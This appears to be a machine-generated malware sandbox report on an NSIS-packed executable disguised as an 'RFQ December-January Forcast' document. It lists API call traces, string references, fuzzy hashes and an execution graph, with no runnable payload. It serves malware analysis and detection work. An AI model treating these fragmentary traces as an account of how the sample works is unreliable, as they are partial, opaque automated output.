                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                            • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3677997916-1824292864
                                                                                                            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                            • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                            • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3081826266
                                                                                                            • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                            • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                            • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                            • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                            APIs
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                            • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                            • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                            • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2102729457-0
                                                                                                            • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                            • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 00405AC2
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 00405B6A
                                                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3248276644-3081826266
                                                                                                            • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                            • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                            • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                            • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                            • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-3081826266
                                                                                                            • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                            • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                            • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                            • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-224404859
                                                                                                            • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                            • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                            • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                            • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                            • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.2%
                                                                                                            Total number of Nodes:278
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 43462 36b0ce60 43463 36b0ce7c 43462->43463 43466 36b094b4 43463->43466 43465 36b0ce9b 43467 36b094bf 43466->43467 43468 36b0cf4f 43467->43468 43471 36b0cf68 43467->43471 43475 36b0cf59 43467->43475 43468->43465 43472 36b0cf96 43471->43472 43473 36b0d021 43472->43473 43479 36b095e8 43472->43479 43473->43473 43478 36b0cf68 43475->43478 43476 36b0d021 43476->43476 43477 36b095e8 3 API calls 43477->43476 43478->43476 43478->43477 43480 36b095f3 43479->43480 43482 36b0ec47 43480->43482 43483 36b0e7f4 43480->43483 43482->43473 43485 36b0e7ff 43483->43485 43484 36b0f111 43484->43482 43485->43484 43488 36b0fab0 43485->43488 43493 36b0faa1 43485->43493 43489 36b0fadb 43488->43489 43490 36b0fb8a 43489->43490 43498 36b200b0 43489->43498 43507 36b200c0 43489->43507 43494 36b0fadb 43493->43494 43495 36b0fb8a 43494->43495 43496 36b200b0 3 API calls 43494->43496 43497 36b200c0 3 API calls 43494->43497 43496->43495 43497->43495 43499 36b200ba 43498->43499 43500 36b200fd CreateWindowExW 43498->43500 43504 36b200b0 2 API calls 43499->43504 43512 36b20104 43499->43512 43516 36b20110 43499->43516 43503 36b20234 43500->43503 43501 36b200f5 43501->43490 43503->43503 43504->43501 43509 36b200b0 3 API calls 43507->43509 43510 36b20110 CreateWindowExW 43507->43510 43511 36b20104 CreateWindowExW 43507->43511 43508 36b200f5 43508->43490 43509->43508 43510->43508 43511->43508 43513 36b20178 CreateWindowExW 43512->43513 43515 36b20234 43513->43515 43515->43515 43517 36b20178 CreateWindowExW 43516->43517 43519 36b20234 43517->43519 43259 36b2e6d0 DispatchMessageW 43260 36b2e73c 43259->43260 43520 36b220c0 43523 36b220ed 43520->43523 43521 36b2213c 43521->43521 43523->43521 43524 36b217fc 43523->43524 43525 36b21807 43524->43525 43526 36b2229c 43525->43526 43535 36b217d0 43525->43535 43529 36b095e8 3 API calls 43526->43529 43531 36b0ec1a 43526->43531 43528 36b222a5 43528->43521 43529->43528 43532 36b0ec47 43531->43532 43533 36b0ec22 43531->43533 43532->43528 43533->43532 43534 36b0e7f4 3 API calls 43533->43534 43534->43532 43536 36b217db 43535->43536 43539 36b2181c 43536->43539 43538 36b222f5 43538->43526 43540 36b21827 43539->43540 43541 36b22461 GetCurrentThreadId 43540->43541 